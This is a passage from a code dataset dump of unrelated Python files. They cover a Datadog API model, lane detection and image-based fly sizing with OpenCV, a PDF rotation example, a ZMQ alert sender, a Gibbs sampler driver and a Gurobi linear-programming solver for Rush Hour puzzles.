\"metric\",\n \"type\": \"type\",\n }\n\n def __init__(\n self_,\n aggregation: RUMAggregationFunction,\n interval: Union[str, UnsetType] = unset,\n metric: Union[str, UnsetType] = unset,\n type: Union[RUMComputeType, UnsetType] = unset,\n **kwargs,\n ):\n \"\"\"\n A compute rule to compute metrics or timeseries.\n\n :param aggregation: An aggregation function.\n :type aggregation: RUMAggregationFunction\n\n :param interval: The time buckets' size (only used for type=timeseries)\n Defaults to a resolution of 150 points.\n :type interval: str, optional\n\n :param metric: The metric to use.\n :type metric: str, optional\n\n :param type: The type of compute.\n :type type: RUMComputeType, optional\n \"\"\"\n if interval is not unset:\n kwargs[\"interval\"] = interval\n if metric is not unset:\n kwargs[\"metric\"] = metric\n if type is not unset:\n kwargs[\"type\"] = type\n super().__init__(kwargs)\n\n self_.aggregation = aggregation\n","sub_path":"src/datadog_api_client/v2/model/rum_compute.py","file_name":"rum_compute.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"166063107","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 19 09:32:07 2017\n\n@author: roy\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Feb 11 19:35:19 2017\n\n@author: roy\n\"\"\"\nfrom PIL import Image\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\n#src = np.asarray([[527, 500], [763, 500], [910, 600], [392, 600]], dtype=np.float32)\nsrc = np.asarray([[524, 500], [768, 500], [910, 600], [392, 600]], dtype=np.float32)\n#dst = np.asarray([[392, 300], [910, 300], [910, 600], [390, 600]], dtype=np.float32)\ndst = np.asarray([[196, 300], [455, 300], [455, 600], [196, 600]], dtype=np.float32)\n\nimage = np.asarray(Image.open('./test_images/straight_undist2.jpg').convert('L'))\n\n\nmt_persp=cv2.getPerspectiveTransform(src, dst)\n\nimg_size = (image.shape[1]//2, image.shape[0])\n\nimg_warped = cv2.warpPerspective(image, mt_persp, img_size)\n\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img_warped)\n\ndef lane_search(image):\n nwindows = 10\n margin = 100\n minpix = 50\n \n img_h, img_w = image.shape\n window_height = img_h//nwindows\n \n hstg = np.sum(image[img_h//2:, :], axis=0)\n img_out = np.dstack((image, image, image))*255\n \n midpoint = img_w//2\n leftx_base = np.argmax(hstg[:midpoint])\n rightx_base = np.argmax(hstg[midpoint:]) + midpoint\n \n nonzero = image.nonzero()\n nonzeroy = nonzero[0]\n nonzerox = nonzero[1]\n \n leftx_current = leftx_base\n rightx_current = rightx_base\n \n left_lane_inds = []\n right_lane_inds = []\n\n for window in range(nwindows):\n win_y_low = img_h - (window + 1)*window_height\n win_y_high = img_h - window * window_height\n \n win_xleft_low = leftx_current - margin\n win_xleft_high = leftx_current + margin\n \n win_xright_low = rightx_current - margin\n win_xright_high = rightx_current + margin\n \n #cv2.rectangle(img_out, (win_xleft_low, win_y_low), \n # (win_xleft_high, win_y_high), (0, 255, 0), 2)\n #cv2.rectangle(img_out, (win_xright_low, win_y_low), \n # (win_xright_high, win_y_high), (0, 255, 0), 2)\n \n good_left_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) & \n (nonzerox >= win_xleft_low) & (nonzerox < win_xleft_high)).nonzero()[0]\n good_right_inds = ((nonzeroy >= win_y_low) & (nonzeroy < win_y_high) &\n (nonzerox >= win_xright_low) & (nonzerox < win_xright_high)).nonzero()[0]\n \n left_lane_inds.append(good_left_inds)\n right_lane_inds.append(good_right_inds)\n \n if len(good_left_inds) > minpix:\n leftx_current = np.int(np.mean(nonzerox[good_left_inds]))\n if len(good_right_inds) > minpix:\n rightx_current = np.int(np.mean(nonzerox[good_right_inds]))\n \n left_lane_inds = np.concatenate(left_lane_inds)\n right_lane_inds = np.concatenate(right_lane_inds)\n\n leftx = nonzerox[left_lane_inds]\n lefty = nonzeroy[left_lane_inds]\n left_fit = np.polyfit(lefty, leftx, 2)\n print(left_fit)\n \n radius_l = cal_radius(leftx, lefty)\n print(radius_l)\n\n rightx = nonzerox[right_lane_inds]\n righty = nonzeroy[right_lane_inds]\n right_fit = np.polyfit(righty, rightx, 2)\n print(right_fit)\n \n radius_r = cal_radius(rightx, righty)\n print(radius_r)\n \n # find indice for the whole image\n whole_img = np.indices((img_h, img_w))\n imgx= whole_img[1].flatten()\n imgy = whole_img[0].flatten()\n \n #print('imgx shape {}, imgy shape {}'.format(imgx.shape, imgy.shape))\n # got indice between left lane and right lane\n lane_inds = ((imgx >= (left_fit[0]*(imgy**2) + left_fit[1] * imgy + left_fit[2])) \n & (imgx < (right_fit[0]*(imgy**2) + right_fit[1] * imgy + right_fit[2])))\n # paint the lane to green\n img_out[imgy[lane_inds], imgx[lane_inds]] = [0, 255, 0]\n \n #paint left track to Red, right track to green\n img_out[nonzeroy[left_lane_inds], nonzerox[left_lane_inds]] = [255, 0, 0]\n img_out[nonzeroy[right_lane_inds], nonzerox[right_lane_inds]] = [0, 0, 255]\n \n\n return img_out\n\ndef cal_radius(x, y):\n mppx = 3.7/270\n #mppx = 3.7/540\n mppy = 3.0/100\n fit_rw = np.polyfit(y * mppy, x * mppx, 2)\n py_rw = 350 * mppy\n radius = (1.0 + (2*fit_rw[0]*py_rw+fit_rw[1])**2)**1.5/(2.0*fit_rw[0])\n return radius\n \ndef sobel_filter(image_gray, orient='x', kern_size = 3, thresh=(0, 255)):\n # Calculate directional gradient\n # Apply threshold\n if orient == 'x':\n sobel_img = cv2.Sobel(image_gray, cv2.CV_64F, 1, 0, ksize=kern_size)\n elif orient == 'y':\n sobel_img = cv2.Sobel(image_gray, cv2.CV_64F, 0, 1, ksize=kern_size)\n \n sobel_img[ sobel_img < 0 ] =0\n #sobel_img = np.abs(sobel_img)\n scaled_sobel = np.uint8(255 * sobel_img/np.max(sobel_img))\n grad_binary = np.zeros_like(image_gray)\n grad_binary[( scaled_sobel >= thresh[0] ) & (scaled_sobel <= thresh[1])] = 1\n return grad_binary\n\nimg3 = sobel_filter(img_warped, orient='x', kern_size=5, thresh=(100, 255))\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img3)\n\nimg4 = lane_search(img3)\n\nplt.figure(figsize=(12,9))\nplt.gray()\nplt.imshow(img4)\n","sub_path":"test_curvature.py","file_name":"test_curvature.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"296079053","text":"# By submitting this assignment, I agree to the following:\n# \"Aggies do not lie, cheat, or steal, or tolerate those who do\"\n# \"I have not given or received any unauthorized aid on this assignment\"\n#\n# Name: Chase Johnson, Anna Olmedo, Bryan Jones, Gustavo Rodriguez\n# Section: 413\n# Assignment: Lab 02_Act3_Bonus\n# Date: 5 September, 2019\n\nfrom math import *\n\n# Set values\nxi = 30 # Starting time\ny = 50 # Distance Traveled\nspeed = 565/15\ntrackLength = 2*pi*0.5\n\nchoice = input(\"Are you giving me (m)inutes or (s)econds [s]? \")\nms = \"s\"\nif \"m\" in choice:\n ms = \"m\"\n\ntimeToRace = float(input(\"How long do you want the car to drive? \"))\nif ms == \"m\":\n timeToRace = timeToRace*60\n\ny += (timeToRace-xi)*(speed) # Current position\nprint(\"Distance at time: \" + str(int(timeToRace)) + \" = \" + str(y) + \" meters\")\n","sub_path":"Group_Labs/Lab02/Act3_Bonus.py","file_name":"Act3_Bonus.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"73254542","text":"#! -*- coding:utf-8 -*-\n\n'''\n@Author: ZM\n@Date and Time: 2021/5/4 10:39\n@File: nms.py\n'''\n\nimport numpy as np\n\ndef nms(bboxes, scores, iou_threshold=0.5, max_num_boxes=20):\n y1 = bboxes[:, 0]\n x1 = bboxes[:, 1]\n y2 = bboxes[:, 2]\n x2 = bboxes[:, 3]\n\n areas = (y2 - y1) * (x2 - x1)\n order = np.argsort(scores)[::-1]\n nms_index = []\n\n while np.size(order) > 0:\n i = order[0]\n nms_index.append(i)\n\n y_min = np.maximum(y1[i], y1[order[1:]])\n x_min = np.maximum(x1[i], x1[order[1:]])\n y_max = np.minimum(y2[i], y2[order[1:]])\n x_max = np.minimum(x2[i], x2[order[1:]])\n inter = np.maximum(0, y_max - y_min) * np.maximum(0, x_max - x_min)\n iou = inter / (areas[i] + areas[order[1:]] - inter)\n idx = np.nonzero(iou <= iou_threshold)[0]\n order = order[idx + 1]\n\n return nms_index[:max_num_boxes]\n","sub_path":"yolov3/nms.py","file_name":"nms.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"151600230","text":"import numpy as np\nimport argparse\nimport imutils\nimport cv2\nimport os\nimport warnings\nimport csv\n\n# construct the argument parser and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-d\", \"--dir\", required=True, help=\"Path to the image\")\nargs = vars(ap.parse_args())\n#args = [\"/Users/Wolf/Desktop/Area_Weight_correlation/tiff_images\"]\n\ncount = 0\nrows = []\n\ndef calculateHoughCircles(fileName):\n # load the image, clone it for output\n image = cv2.imread(fileName)\n if (image.shape[0] > image.shape[1]):\n image = imutils.rotate_bound(image, 270)\n output = image.copy()\n global rows\n global count\n height, width, depth = image.shape\n\n # Grayscale\n imgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # Median\n #*** Blurring can require modification for the script to work ***\n blur = cv2.medianBlur(imgray, 23)\n # Thresh\n ret1, thresh1 = cv2.threshold(blur, 0, 255, cv2.THRESH_TOZERO + cv2.THRESH_OTSU)\n \n #*** (ret1 - 12) is the threshold as a factor of the one determined by cv2.THRESH_TOZERO + cv2.THRESH_OTSU above. Its modification can fix the script. ***\n ret2, thresh = cv2.threshold(blur, (ret1 - 12), 255, cv2.THRESH_TOZERO)\n edged = cv2.Canny(thresh, 0, 255)\n\n # Crop image\n cropped = np.zeros((height, width), np.uint8)\n # NOTE: This cropping can be very problematic. It can cut too much or not enough depending on the image. Make sure to adjust this when implementing the algorithm.\n cropped[250:(height - 250), 450:(width - 450)] = -1\n\n masked = cv2.bitwise_and(edged, edged, mask=cropped)\n\n #In the line below, the parameters are very relevant for the alg. Radius, sensitivity, minDist, etc. can affect the algorithm. Change them before looking further.\n circles = cv2.HoughCircles(masked, cv2.HOUGH_GRADIENT, 5, 320, minRadius=120, maxRadius=160)\n\n # detect circles in the image\n # https://docs.opencv.org/3.1.0/da/d53/tutorial_py_houghcircles.html\n # VERY parameter specific. This requires tweaking at the photo level and is non generalizable.\n # Standardized pictures should fix this problem. We have a ~95% success rate\n\n # First check for 96 wells\n warn = False\n kill = False\n #print(circles.shape)\n if circles.shape[1] > 96:\n warnings.warn(\"96 wells were not detected! Skipping image\")\n print(\"Filename: \", os.path.basename(fileName))\n print(\"Greater than 96 wells were detected. Skipping image.\")\n kill = True\n \n if circles.shape[1] < 96:\n warnings.warn(\"96 wells were not detected! Skipping image.\")\n print(\"Filename: \", os.path.basename(fileName))\n print(\"Less than than 96 wells were detected. Skipping image.\")\n kill = True\n\n if circles is not None and kill == False:\n count = count + 1\n # convert the (x, y) coordinates and radius of the circles to integers\n circles = np.round(circles[0, :]).astype(\"int\")\n circ = circles.tolist()\n circ.sort(key=lambda x: x[1])\n # Hardcode list structure - rows on horizontals\n Lists = [[] for _ in range(8)]\n Lists[0] = circ[0:12]\n Lists[1] = circ[12:24]\n Lists[2] = circ[24:36]\n Lists[3] = circ[36:48]\n Lists[4] = circ[48:60]\n Lists[5] = circ[60:72]\n Lists[6] = circ[72:84]\n Lists[7] = circ[84:96]\n\n for l in Lists:\n if (len(l) != 12):\n warnings.warn(\"Wrong count of wells in a row\")\n l.sort(key=lambda x: x[0])\n for i in range(8):\n for n in range(12):\n (x, y, r) = Lists[i][n]\n xo = np.round(x).astype(\"int\")\n yo = np.round(y).astype(\"int\")\n ro = np.round(r).astype(\"int\")\n\n crop = output[(y - r):(y + r), (x - r):(x + r)]\n crop_gray = cv2.cvtColor(crop, cv2.COLOR_BGR2GRAY)\n ret, threshCrop1 = cv2.threshold(crop_gray, 0, 255, cv2.THRESH_TOZERO + cv2.THRESH_OTSU)\n \n #*** (ret1 - 15) is the threshold as a factor of the one determined by cv2.THRESH_TOZERO + cv2.THRESH_OTSU above. Its modification can fix the script. ***\n ret, threshCrop = cv2.threshold(crop_gray, (ret - 15), 255, cv2.THRESH_TOZERO)\n ret2, tc2 = cv2.threshold(threshCrop, 1, 255, cv2.THRESH_BINARY_INV)\n\n height, width = 2 * r, 2 * r\n mask = np.zeros((height, width), np.uint8)\n \n #Cut circle with radius = 25 from section of image. This keeps edges of well from interferring with flies. \n cv2.circle(mask, (r, r), (r - 25), (255, 255, 255), thickness=-1)\n masked_data = cv2.bitwise_and(tc2, tc2, mask=mask)\n \n image, contours, hierarchy = cv2.findContours(masked_data, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n contour_list = []\n area = 0\n for contour in contours:\n approx = cv2.approxPolyDP(contour, 0.01 * cv2.arcLength(contour, True), True)\n tempArea = cv2.contourArea(contour)\n (x, y), radius = cv2.minEnclosingCircle(contour)\n #Ad hoc morphology check\n if (len(approx) > 5) & (tempArea < 5000) & (tempArea > 1000) & (3.1415 * (radius ** 2) / 7 < tempArea):\n contour_list.append(contour)\n area = tempArea\n cv2.drawContours(masked_data, contour_list, -1, (50, 50, 50), 3)\n cv2.circle(output, (xo, yo), ro, (0, 255, 0), 4)\n rows.append({'NumericalLocation(Row)': str(i + 1), 'NumericalLocation(Col)': str(n + 1), 'Area': area,'FileName': os.path.basename(fileName)})\n if warn:\n cv2.imshow(\"output\", output)\n cv2.waitKey(0)\n\n\n\n\ntotal = 0\nfor file in os.listdir(args[0]):\n if file.endswith(\".tiff\"):\n total = total + 1\n print(os.path.join(args[0], file))\n calculateHoughCircles(os.path.join(args[0], file))\n\nwith open('Output.csv', 'w') as csvfile:\n fieldnames = ['NumericalLocation(Row)', 'NumericalLocation(Col)', 'Area', \"FileName\"]\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n writer.writerows(rows)\n \nprint(\"Used \", count, \" out of \", total, \" images.\")\n\nif count/total < 0.75:\n warnings.warn(\"Less than 75% of images used.\")\nif count < 10:\n warnings.warn(\"Used less than 10 images for size estimates.\")\n","sub_path":"AssortedScripts/FlySizer.py","file_name":"FlySizer.py","file_ext":"py","file_size_in_byte":6534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"108034687","text":"# PDFs with Python - get number of pages, rotate pdf.\n# Input - dummy.pdf\n# Output - tilt.pdf\n\nimport PyPDF2\n\nwith open('dummy.pdf', 'rb') as file:\n # print(file)\n reader = PyPDF2.PdfFileReader(file)\n print(reader.numPages) # get number of pages\n page = reader.getPage(0)\n page.rotateCounterClockwise(90) # rotate pdf\n writer = PyPDF2.PdfFileWriter()\n writer.addPage(page)\n with open('tilt.pdf', 'wb') as new_file:\n writer.write(new_file)\n","sub_path":"pdf1.py","file_name":"pdf1.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"333973630","text":"\"\"\"\nZMQ Sender, Alerts framework.\n\n\"\"\"\n\n\nimport os\nimport logging\n\nimport zmq\n\nfrom WMCore.Alerts.Alert import RegisterMsg, UnregisterMsg, ShutdownMsg\n\n\n\nclass Sender(object):\n \"\"\"\n ZMQ sender to dispatch alerts to a target.\n\n \"\"\"\n # this delay specifies how long to wait when there are un-delivered\n # messages in the ZMQ buffer when closing the socket (channel) / context.\n # some messages may be lost but solves the issue of hanging esp. in the\n # test when there is no receiver available (ticket #1837)\n LINGER_DELAY = 1000 # [ms]\n\n\n def __init__(self, target, controller, label = None):\n self._label = label or \"Sender_%s\" % os.getpid()\n self._context = zmq.Context()\n # set up a channel to send work\n self._workChannel = self._context.socket(zmq.PUSH)\n self._workChannel.setsockopt(zmq.LINGER, self.LINGER_DELAY)\n self._workChannel.connect(target)\n # set up a control channel\n self._contChannel = self._context.socket(zmq.PUB)\n self._contChannel.setsockopt(zmq.LINGER, self.LINGER_DELAY)\n self._contChannel.connect(controller)\n # socket closure will be done on garbage collection of Sender instance\n\n\n def __call__(self, alert):\n \"\"\"\n Send the alert instance to the target that this sender represents.\n\n \"\"\"\n self._workChannel.send_json(alert)\n logging.debug(\"Alert %s sent.\" % alert)\n\n\n def register(self):\n \"\"\"\n Send a register message to the target.\n\n \"\"\"\n self._contChannel.send_json(RegisterMsg(self._label))\n logging.debug(\"Register message sent for %s.\" % self._label)\n\n\n def unregister(self):\n \"\"\"\n Send an unregister message to the target.\n\n \"\"\"\n self._contChannel.send_json(UnregisterMsg(self._label))\n logging.debug(\"Unregister message sent for %s.\" % self._label)\n\n\n def sendShutdown(self):\n \"\"\"\n Tells the Receiver to shut down.\n This method mostly here for convenience in tests.\n\n \"\"\"\n self._contChannel.send_json(ShutdownMsg())\n logging.debug(\"Shutdown message sent.\")\n","sub_path":"src/python/WMCore/Alerts/ZMQ/Sender.py","file_name":"Sender.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"157037937","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/tt/actions/write/stop.py\n# Compiled at: 2020-03-21 10:42:53\n# Size of source mod 2**32: 513 bytes\nfrom tt.dataaccess.utils import get_data_store\nfrom tt.actions.utils.utils import ensure_working\nfrom tt.dateutils.dateutils import formatted_str_for_isotime_str\n\ndef action_stop(colorizer, time):\n data = get_data_store().load()\n ensure_working(data)\n current = data['work'][(-1)]\n current['end'] = time\n get_data_store().dump(data)\n print('So you stopped working on ' + colorizer.red(current['name']) + ' at ' + colorizer.yellow(formatted_str_for_isotime_str(time, '%H:%M')) + '.')","sub_path":"pycfiles/tt_time_tracker-1.0.2-py3.6/stop.cpython-36.py","file_name":"stop.cpython-36.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"140866423","text":"import sys\nimport time\nfrom _2_gibbs_sample import gibbsSampler\n\nwith open(sys.argv[1], \"r\")as file:\n data = file.readlines()\nnums = data[0].split(\" \")\nk = int(nums[0].strip())\nt = int(nums[1].strip())\nn = int(nums[2].strip())\ndna = []\nfor i in range(1, len(data)):\n dna.append(data[i].strip())\n\n\nstart = time.time()\nprint(\"Starting...\")\n# with open(\"res.txt\", \"w\")as res:\n# for i in range(1000):\n# bestmotifs, bestscore = randomized_motif_search(dna, k, t)\n# res.write(\"{}: {}\\n\".format(\", \".join(bestmotifs), str(bestscore)))\n\nresmotifs = []\nresscore = 10000000\nfor i in range(20):\n x = time.time()\n bestmotifs, bestscore = gibbsSampler(dna, k, t, n, x)\n if i == 0 or bestscore < resscore:\n resmotifs = bestmotifs\n resscore = bestscore\n\nprint(\"{}:{}\".format(resmotifs, resscore))\n\nend = time.time()\nprint(\"Done! That took {} seconds\".format(str(end-start)))\n","sub_path":"week4/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"652043586","text":"from datetime import datetime\r\nimport pytz\r\n\r\nfile = '1541962108935000000_167_838.h5'\r\ncern_time=pytz.timezone('Europe/Zurich')\r\nunix_time=float(file[:18])/100000000\r\nutc=datetime.utcfromtimestamp(unix_time)\r\nprint(\"Time in UTC is\",utc)\r\ncern=pytz.utc.localize(utc).astimezone(cern_time)\r\nprint(\"Time in Switzerland/CERN is\",cern)\r\n","sub_path":"Awake/other_files/time.py","file_name":"time.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"10321443","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport gurobipy as gu\n\n\n\ndifficultyValues = [14, 25, 31, 50]\n\ndef solve(map, difficulty, verbose, isRHC):\n if (verbose):\n print(\"Début de la résolution\")\n m = gu.Model(\"RushHour\")\n initialConditions = initConds(map, difficulty, m, verbose)\n m, X, Y, Z = genConstraintsAndVariables(m, map, initialConditions, verbose)\n if (verbose):\n print(\"Affectation de la fonction objectif\")\n toSum = []\n coeffs = []\n vehicules, cases, tours, posInitiale, isVertical, longueur, P = initialConditions\n for i in vehicules:\n for j in cases:\n for l in cases:\n for k in tours:\n try:\n toSum.append(Y[(i,j,l,k)])\n coeffs.append((len(P[(j,l)])-1) if isRHC else 1)\n except:\n pass\n m.setObjective(gu.quicksum(toSum[i]*coeffs[i] for i in range(len(toSum))) , gu.GRB.MINIMIZE)\n m.setParam('OutputFlag', verbose)\n m.optimize()\n f = open(\"log.log\", \"w\")\n f2 = open(\"soluce.txt\", \"w\")\n solution = []\n for v in m.getVars():\n if (v.x == 1):\n print('%s' % (v.varName), file = f)\n if (v.varName[0] == 'Y'):\n s = v.varName.split(\"_\")\n if (verbose):\n print(\"Déplacer le véhicule %s de la case %s à la case %s\" % (s[1], s[2], s[3]))#, file = f2)\n solution.append(\"Déplacer le véhicule %s de la case %s à la case %s\" % (s[1], s[2], s[3]))\n f.close()\n f2.close()\n return solution\n\ndef genConstraintsAndVariables(m, map, initialConditions, verbose):\n #extraction des variables\n vehicules, cases, tours, posInitiale, isVertical, longueur, P = initialConditions\n width, height = map[0]\n #définition des conteneurs pour les variables de décision\n X = {}\n Y = {}\n Z = {}\n\n #variables\n if (verbose):\n print(\"Création des variables de décision\")\n for k in tours:\n for i in vehicules:\n casesOccupables = set()\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n X[(i,j,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"X_%s_%s_%s\" % (i,j,k))\n autresCasesAccessibles = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n autresCasesAccessibles.remove(j)\n for l in autresCasesAccessibles:\n Y[(i,j,l,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"Y_%s_%s_%s_%s\" % (i,j,l,k))\n casesOccupables.add(j)\n if (isVertical[i]):\n for a in range(1,longueur[i]):\n casesOccupables.add(max(casesOccupables) + width)\n else:\n for a in range(1,longueur[i]):\n casesOccupables.add(max(casesOccupables) + 1)\n for j in casesOccupables:\n Z[(i,j,k)] = m.addVar(vtype = gu.GRB.BINARY, name = \"Z_%s_%s_%s\" % (i,j,k))\n #print(Z[('t1', 36, 5)])\n if (verbose):\n print(\"Variables de décision créées\")\n\n #contraintes\n if (verbose):\n print(\"Création des contraintes du PL\")\n #D'abord on instaure les contraintes de départ\n# tours = tours[1:]\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n if (j == posInitiale[i]):\n m.addConstr(X[(i, j, 0)] == 1)\n else:\n m.addConstr(X[(i, j, 0)] == 0)\n for j in rangeeDeCases(posInitiale[i], isVertical[i], map):\n if (j in getCasesOccupees(posInitiale[i], isVertical[i], longueur[i], P, map)):\n m.addConstr(Z[(i, j, 0)] == 1)\n else:\n m.addConstr(Z[(i ,j ,0)] == 0)\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n m.addConstr(Y[(i,j,l,0)] == 0)\n\n\n #Puis on crée les contraintes de transition\n #contrainte 1\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for mm in getCasesOccupees(j, isVertical[i], longueur[i], P, map):\n tmp.append(Z[(i, mm, k)])\n m.addConstr(longueur[i] * X[(i,j,k)] <= gu.quicksum(tmp))\n\n #contrainte 2\n for j in cases:\n for k in tours:\n tmp = []\n for i in vehicules:\n try:\n tmp.append(Z[(i,j,k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= 1)\n\n #contrainte 3\n for i in vehicules:\n for k in tours:\n tmp = []\n for j in rangeeDeCases(posInitiale[i], isVertical[i], map):\n tmp.append(Z[(i,j,k)])\n m.addConstr(gu.quicksum(tmp) == longueur[i])\n\n #contrainte b\n for k in tours:\n tmp = []\n for j in cases:\n for l in cases:\n for i in vehicules:\n try:\n tmp.append(Y[(i,j,l,k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= 1)\n\n #--------------------\n tours = tours[1:]\n #On fait ceci car les contraintes 4 et c ne doivent pas être appliquées pour k = 0\n\n #contrainte a\n for k in tours:\n tmp = []\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n tmp.append(Y[(i,j,l,k)])\n m.addConstr(gu.quicksum(tmp) == (1-X[('g', 17, k-1)]))\n\n\n #contrainte 4\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n for k in tours:\n for p in P[(j,l)]:\n tmp = []\n vprime = vehicules.copy()\n vprime.remove(i)\n for iprime in vprime:\n try:\n tmp.append(Z[(iprime, p, k-1)])\n except:\n pass\n m.addConstr(Y[(i,j,l,k)] <= 1 - gu.quicksum(tmp))\n\n #contrainte c ( à faire pour tous les k != 0) (on accepte que les voitures soient téléportées sur le plateau lors de l'initialisation)\n for i in vehicules:\n for l in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for j in cases:\n try:\n tmp.append(Y[(i, j, l, k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= X[(i, l, k)])\n\n #contrainte supplémentaire qui dit que l'on ne peut déplacer une voiture de j à l que si elle était bien en j avant\n for i in vehicules:\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n for k in tours:\n tmp = []\n for l in cases:\n try:\n tmp.append(Y[(i, j, l, k)])\n except:\n pass\n m.addConstr(gu.quicksum(tmp) <= X[(i, j, k-1)])\n\n #contrainte supplémentaire qui dit que les véhicules sont toujours quelque part\n for k in tours:\n for i in vehicules:\n tmp = []\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n tmp.append(X[(i,j,k)])\n m.addConstr(gu.quicksum(tmp) == 1)\n\n #contrainte supplémentaire qui maintient le marqueur des véhicules non déplacés\n for i in vehicules:\n for k in tours:\n tmp = []\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n casesSansJ = casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map)\n casesSansJ.remove(j)\n for l in casesSansJ:\n tmp.append(Y[(i,j,l,k)])\n\n for j in casesAccessibles(posInitiale[i], isVertical[i], longueur[i], map):\n m.addConstr(gu.quicksum(tmp) >= X[(i,j,k)] - X[(i,j,k-1)])\n m.addConstr(gu.quicksum(tmp) >= X[(i,j,k-1)] - X[(i,j,k)])\n if (verbose):\n print(\"Contraintes créées\")\n return m, X, Y, Z\n\ndef rangeeDeCases(marqueur, isVertical, map):#fini\n return casesAccessibles(marqueur, isVertical, 1, map)\n\ndef casesAccessibles(marqueur, isVertical, longueur, map):#fini\n res = []\n width, height = map[0]\n if (isVertical):\n tmp = marqueur\n while (tmp-width > 0):\n tmp -= width #on remonte en haut de la colonne\n for i in range(height - longueur +1):\n res.append(tmp)\n tmp += width #et on ajoute les cases en descendant\n else:\n tmp = marqueur\n while ((tmp-1) % width != 0):\n tmp -= 1\n for i in range(width - longueur +1):\n res.append(tmp)\n tmp += 1\n return res\n\n\ndef initConds(map, difficulty, m, verbose):#fini\n if (verbose):\n print(\"Lecture des conditions de départ\")\n width, height = map[0]\n matrice = map[1]\n\n cases = range(1, width*height +1)\n\n tours = range(0, difficultyValues[difficulty]+1)\n\n posInitiale = {}\n vehicules = []\n isVertical = {}\n V = {}\n P = calculerP(map)\n M = {}\n visited = np.zeros(getCaseIndex(width, height-1, map), dtype=bool)\n for y in range(height):\n for x in range(width):\n cur = matrice[y][x]\n case = getCaseIndex(x+1,y,map)\n if (cur != '0' and (not visited[case-1])):\n vehicules.append(cur)\n posInitiale[cur] = case\n if (cur[0] == 't'):\n V[cur] = 3\n else:\n V[cur] = 2\n if ((x == width-1) or (matrice[y][x+1] != cur)):\n isVertical[cur] = True\n else:\n isVertical[cur] = False\n co = getCasesOccupees(posInitiale[cur], isVertical[cur], V[cur], P, map)\n M[(cur, case)] = co\n for c in co:\n visited[c-1] = True\n visited[case-1] = True\n if (verbose):\n print(\"Fin de la lecture des conditions de départ\")\n return vehicules, cases, tours, posInitiale, isVertical, V, P\n\n\ndef getCasesOccupees(marqueur, isVertical, longueur, P, map):#fini\n width, height = map[0]\n if (isVertical):\n return P[(marqueur, marqueur + (longueur-1)*width)]\n else:\n return P[(marqueur, marqueur + (longueur-1))]\n\ndef getCaseIndex(x,y, map):#fini\n width, height = map[0]\n return x + y*width\n\ndef calculerP(map):#fini\n P = {}\n width, height = map[0]\n for x1 in range(width):\n for y1 in range(height):\n for x2 in range(width):\n case1 = getCaseIndex(x1+1, y1, map)\n case2 = 